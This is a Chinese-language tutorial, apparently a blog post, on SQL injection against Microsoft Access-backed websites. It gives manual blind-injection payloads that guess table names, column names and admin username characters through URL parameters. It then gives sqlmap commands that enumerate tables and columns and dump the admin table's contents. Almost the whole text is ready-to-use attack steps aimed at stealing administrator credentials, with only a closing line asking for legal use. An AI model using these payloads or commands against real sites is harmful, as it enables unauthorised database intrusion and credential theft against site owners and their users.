一、Microsoft Office Access數據庫手工注入語句
1、參數后面加 ’ 、and 1=1、and 1=2看返回狀態判斷是否存在注入點
2、參數后面加 and exists(select*from admin) 猜表名 返回正常頁面表示存在(admin)
3、參數后面加 and exists(select username from admin)猜(admin)表中是否存在列名(username) 返回正常頁面表示存在
4、參數后面加 and (select top 1 len(username) from admin)=1 猜字段(username)長度(解釋:username列中第一條記錄的字符長度等於1 也可以用 大於號> 來判斷,可以使用二分測試)
5、參數后面加 and (select top 1 asc(mid(username,1,1))from admin)=97 猜字段(username)中第一條記錄內容的第一個字符(字符替換成相應的ASCII碼,ASCII碼97表示a)
and (select top 1 asc(mid(username,2,1))from admin)=97 猜字段(username)中第一條記錄內容的第二個字符 (字符替換成相應的ASCII碼,ASCII碼97表示a) 自己測,個數為第4步測出來的長度
二、Microsoft Office Access數據庫SQLMAP注入語句
對sqlmap使用不熟悉的同學,請轉到 https://www.cnblogs.com/iAmSoScArEd/articles/9263735.html 學習sqlmap基礎用法
1、sqlmap -u "url" --tables 猜表名 (在這里只用修改url) 確定為access數據庫后再按此文章執行
執行后可能會詢問如下圖中 1 所示,輸入 y 然后回車 表示使用字典查詢表名,然后會輸出2 詢問你是使用默認字典還是自定義 默認則直接按回車,需要自己設置 就輸入2 然后回車。
上圖中為使用默認字典跑出來的表名。
2、sqlmap -u "url" -T "表名" --columns 猜字段名 (表名為第一步跑出來的表名)
在這個步驟中依然會詢問步驟一 圖2中的問題,依然輸入 y 回車,接着如果使用默認字典直接回車,若使用自定義字典輸入2 然后回車。
3、sqlmap -u "url" -T "表名" -C “字段1,字段2,字段3……” --dump 猜解表名中的字段內容 下圖中包含步驟2猜解出來的字段
下圖中包含表示admin字段爆出來的內容和結果,其中1顯示了本次dump的結果保存的路徑,2表示本次sqlmap掃描的日志文件路徑
以上操作請在合法的范圍內使用,請勿非法利用,謝謝!若造成損失由其自行承擔,與本人無關。